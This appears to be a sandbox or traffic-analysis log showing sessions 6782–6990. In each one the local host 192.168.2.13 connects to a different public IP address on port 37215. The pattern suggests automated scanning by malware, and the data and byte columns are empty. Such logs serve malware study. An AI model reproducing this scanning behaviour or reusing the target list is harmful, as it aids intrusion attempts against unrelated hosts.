                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6782192.168.2.134100041.185.119.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6783192.168.2.1358058197.169.177.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6784192.168.2.1352688197.53.86.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6785192.168.2.135125241.103.158.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6786192.168.2.134556441.49.243.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6787192.168.2.1349076157.141.129.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6788192.168.2.1349472197.14.235.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6789192.168.2.135762641.80.6.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6790192.168.2.1336920157.63.11.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6791192.168.2.135588873.134.197.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6792192.168.2.1334292197.65.134.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6793192.168.2.1340748178.122.102.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6794192.168.2.134368617.243.178.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6795192.168.2.1337098157.147.22.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6796192.168.2.1337134197.68.7.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6797192.168.2.1355000197.84.119.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6798192.168.2.1341158197.223.60.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6799192.168.2.1334354157.129.233.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6800192.168.2.135919841.133.167.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6801192.168.2.1334496157.251.67.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6802192.168.2.134930441.154.151.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6803192.168.2.1337074157.227.234.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6804192.168.2.1333062157.52.12.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6805192.168.2.1333388176.16.193.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6806192.168.2.1335390157.38.188.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6807192.168.2.133770041.204.216.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6808192.168.2.133596041.134.41.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6809192.168.2.135109824.176.254.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6810192.168.2.134931441.243.86.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6811192.168.2.1360692197.188.195.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6812192.168.2.133864641.165.11.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6813192.168.2.1347854157.219.12.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6814192.168.2.136022641.68.91.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6815192.168.2.1348124197.63.226.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6816192.168.2.1348740157.141.179.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6817192.168.2.135235041.10.222.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6818192.168.2.135237841.199.60.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6819192.168.2.1347038157.67.128.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6820192.168.2.1350350197.94.227.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6821192.168.2.135540880.46.154.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6822192.168.2.134203025.156.82.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6823192.168.2.134038041.158.172.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6824192.168.2.135455490.10.149.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6825192.168.2.1347876157.20.232.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6826192.168.2.134506041.43.32.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6827192.168.2.133459641.152.185.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6828192.168.2.1333788157.242.156.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6829192.168.2.1359960197.220.112.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6830192.168.2.1345670197.203.208.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6831192.168.2.1353134199.45.19.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6832192.168.2.134540441.152.16.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6833192.168.2.1346442157.20.30.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6834192.168.2.1345824182.112.230.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6835192.168.2.133915241.56.180.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6836192.168.2.1357080197.29.7.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6837192.168.2.1337688197.237.43.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6838192.168.2.1341116157.101.231.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6839192.168.2.1337938158.76.171.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6840192.168.2.1343934197.176.3.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6841192.168.2.134215413.59.92.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6842192.168.2.135596441.204.85.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6843192.168.2.134064013.248.51.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6844192.168.2.1354374190.110.102.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6845192.168.2.133911657.223.243.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6846192.168.2.1354706157.238.246.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6847192.168.2.1350184197.9.12.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6848192.168.2.1356824157.215.68.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6849192.168.2.1355234157.219.96.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6850192.168.2.1344234126.58.24.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6851192.168.2.135695041.227.233.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6852192.168.2.134840241.199.83.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6853192.168.2.136060463.14.180.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6854192.168.2.1347414157.183.103.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6855192.168.2.1338396157.105.175.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6856192.168.2.1334476157.94.180.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6857192.168.2.134966234.88.247.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6858192.168.2.1349968197.49.16.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6859192.168.2.1353210197.117.50.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6860192.168.2.1359202197.163.127.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6861192.168.2.1360022157.168.160.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6862192.168.2.1350642197.56.127.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6863192.168.2.133299273.207.163.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6864192.168.2.1343014197.47.92.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6865192.168.2.135765641.248.130.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6866192.168.2.1353922157.241.226.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6867192.168.2.1354042157.34.80.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6868192.168.2.1351438157.190.247.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6869192.168.2.1338896105.7.201.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6870192.168.2.1336174177.193.231.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6871192.168.2.133377841.199.126.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6872192.168.2.1360128157.91.73.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6873192.168.2.1351596125.211.226.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6874192.168.2.135026241.176.250.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6875192.168.2.134805241.39.255.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6876192.168.2.1359578197.249.218.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6877192.168.2.1341024197.0.241.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6878192.168.2.1341398197.168.40.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6879192.168.2.133375285.170.35.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6880192.168.2.1333480211.58.122.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6881192.168.2.134276841.132.211.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6882192.168.2.1354950157.124.125.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6883192.168.2.1333322157.212.106.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6884192.168.2.134857641.196.93.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6885192.168.2.1355016197.53.238.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6886192.168.2.1352010184.42.152.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6887192.168.2.1352798197.19.97.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6888192.168.2.1347106197.168.98.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6889192.168.2.1337250160.207.81.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6890192.168.2.1334200157.19.120.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6891192.168.2.134141039.45.193.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6892192.168.2.1356656198.20.219.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6893192.168.2.1340180197.46.116.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6894192.168.2.1338006157.74.228.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6895192.168.2.133502041.106.3.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6896192.168.2.134438814.62.39.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6897192.168.2.1343404197.198.248.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6898192.168.2.1346844157.87.212.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6899192.168.2.1339762112.109.236.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6900192.168.2.134815412.205.162.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6901192.168.2.1348920195.219.47.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6902192.168.2.1341256144.135.90.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6903192.168.2.1336862197.44.185.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6904192.168.2.1347920157.63.160.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6905192.168.2.1339788153.99.189.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6906192.168.2.1342044157.20.8.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6907192.168.2.133708241.37.217.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6908192.168.2.1335162157.167.196.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6909192.168.2.1340032102.90.62.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6910192.168.2.1345156157.67.85.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6911192.168.2.1340372197.78.188.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6912192.168.2.135602441.7.101.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6913192.168.2.1355900197.21.138.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6914192.168.2.1356954140.140.37.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6915192.168.2.133757641.208.25.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6916192.168.2.135728841.174.185.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6917192.168.2.1358050164.123.245.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6918192.168.2.1354676157.69.15.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6919192.168.2.1342924168.128.71.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6920192.168.2.135933041.113.236.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6921192.168.2.1335712197.60.115.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6922192.168.2.1338462197.218.118.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6923192.168.2.133364849.63.142.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6924192.168.2.1338674216.229.228.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6925192.168.2.1340762157.151.7.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6926192.168.2.135388836.87.26.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6927192.168.2.135338837.59.122.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6928192.168.2.1333506157.163.214.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6929192.168.2.1345938197.20.214.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6930192.168.2.1354648197.135.39.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6931192.168.2.1351060197.112.192.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6932192.168.2.135271241.73.193.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6933192.168.2.133342841.39.131.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6934192.168.2.1356502157.204.14.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6935192.168.2.134960241.63.186.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6936192.168.2.1356836197.190.124.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6937192.168.2.134491041.28.45.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6938192.168.2.133806441.139.202.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6939192.168.2.1334074157.219.229.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6940192.168.2.1337446157.0.69.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6941192.168.2.135548841.111.187.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6942192.168.2.1344504197.32.15.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6943192.168.2.135067641.152.48.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6944192.168.2.134403241.3.114.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6945192.168.2.134873641.212.185.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6946192.168.2.1348878157.94.149.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6947192.168.2.1349438157.70.219.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6948192.168.2.1360340197.162.107.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6949192.168.2.13460588.78.128.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6950192.168.2.1343538197.67.169.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6951192.168.2.133321641.204.24.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6952192.168.2.1360450129.218.65.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6953192.168.2.135052641.179.211.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6954192.168.2.1358986157.119.117.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6955192.168.2.136067641.132.132.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6956192.168.2.133353454.225.74.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6957192.168.2.1336744197.231.34.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6958192.168.2.1357396155.216.96.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6959192.168.2.1347318157.99.179.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6960192.168.2.1336318176.161.206.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6961192.168.2.1339332157.192.172.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6962192.168.2.134147241.37.109.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6963192.168.2.134001441.220.143.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6964192.168.2.134225241.124.235.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6965192.168.2.1350090157.225.37.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6966192.168.2.134072241.173.224.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6967192.168.2.1356888197.76.205.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6968192.168.2.1339606157.244.111.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6969192.168.2.1352732197.68.89.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6970192.168.2.1341100197.213.32.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6971192.168.2.133727041.198.36.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6972192.168.2.1335168157.205.156.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6973192.168.2.1336394157.57.21.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6974192.168.2.133724841.16.192.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6975192.168.2.1335538157.201.24.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6976192.168.2.134496241.245.230.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6977192.168.2.1343396197.178.189.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6978192.168.2.1338676157.164.87.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6979192.168.2.1356254197.49.152.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6980192.168.2.1354646157.58.64.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6981192.168.2.1332946157.126.144.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6982192.168.2.1337050197.63.50.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6983192.168.2.1345718197.102.21.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6984192.168.2.1335952211.227.237.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6985192.168.2.1346298197.235.56.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6986192.168.2.135979477.84.30.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6987192.168.2.133422441.105.213.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6988192.168.2.1334336197.158.153.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6989192.168.2.1357616111.198.29.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6990192.168.2.135248224.88.188.10337215
                                                  TimestampBytes transferredDirectionData


